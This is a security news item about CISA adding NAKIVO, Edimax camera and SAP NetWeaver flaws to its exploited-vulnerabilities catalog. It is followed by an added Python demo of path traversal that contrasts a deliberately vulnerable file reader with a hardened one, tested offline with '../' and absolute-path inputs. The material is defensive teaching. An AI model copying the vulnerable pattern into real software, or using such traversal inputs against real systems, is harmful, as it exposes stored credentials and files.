CISA has added a high-severity flaw in NAKIVO Backup & Replication (CVE-2024-48248, CVSS 8.6) to its Known Exploited Vulnerabilities (KEV) catalog. The path traversal bug lets an unauthenticated attacker read arbitrary files on the host, including stored credentials. It affects versions before 10.11.3.86570 and was patched in v11.0.0.88174.

Two other vulnerabilities were also added:

  • CVE-2025-1316 (CVSS 9.3): A remote code execution flaw in Edimax IC-7100 IP cameras, exploited to deploy Mirai botnet variants. The camera is end-of-life and Edimax has said no fix will be issued.
  • CVE-2017-12637 (CVSS 7.5): A directory traversal flaw in SAP NetWeaver AS Java, used to steal sensitive SAP system files, potentially leading to full system compromise.

Federal agencies must apply mitigations by April 9, 2025. SAP cybersecurity firm Onapsis reports active exploitation of CVE-2017-12637, with attackers leveraging it to extract privileged credentials and gain full access to vulnerable SAP applications.
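Both the NAKIVO and the SAP NetWeaver entries are the same bug class: a file-serving endpoint that joins a client-supplied path onto a base directory without checking where the result lands. The following is an added example, not NAKIVO’s or SAP’s code and not from the original post, that shows the vulnerable pattern beside the hardened form and exercises both against a constructed temp directory so the demo runs offline.

```python
"""The path-traversal pattern behind the NAKIVO and SAP entries: a file-serving endpoint that
joins a client-supplied path onto a base directory, shown vulnerable and hardened.

Added example, not NAKIVO's or SAP's code and not from the original post; the temp directory
and files are constructed so the demo runs offline.
"""
import os
import tempfile
from pathlib import Path


def read_file_vulnerable(base_dir, user_path):
    """os.path.join lets '../' climb out and lets an absolute user_path discard base_dir entirely."""
    return Path(os.path.join(base_dir, user_path)).read_bytes()


def read_file_hardened(base_dir, user_path):
    """Resolve symlinks and '..' first, then require the target to sit under the base."""
    base = Path(base_dir).resolve()
    target = (base / user_path).resolve()      # an absolute user_path replaces base here, so it is caught too
    if target != base and base not in target.parents:
        raise PermissionError(f"refusing to read outside {base}: {user_path!r}")
    return target.read_bytes()


def demo():
    """Constructed layout: <tmp>/images/logo.png is servable, <tmp>/config.secret is not."""
    with tempfile.TemporaryDirectory() as tmp:
        images = Path(tmp, "images")
        images.mkdir()
        (images / "logo.png").write_bytes(b"PNG")
        secret = Path(tmp, "config.secret")
        secret.write_bytes(b"db-password")
        out = {
            "vuln_relative": read_file_vulnerable(images, "../config.secret"),
            "vuln_absolute": read_file_vulnerable(images, str(secret)),
            "ok": read_file_hardened(images, "logo.png"),
        }
        blocked = []
        for probe in ("../config.secret", str(secret)):
            try:
                read_file_hardened(images, probe)
                blocked.append(False)
            except PermissionError:
                blocked.append(True)
        out["hardened_blocked"] = blocked
        return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value!r}")
```

The check has to run on the resolved path, not on the raw string: rejecting "../" textually misses absolute paths, URL-encoded dots and symlinks planted inside the base directory. And in the NAKIVO case the endpoint was reachable without authentication, which is the second half of the fix; a correct path check on an authenticated endpoint would have limited the blast radius even before the traversal was closed.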
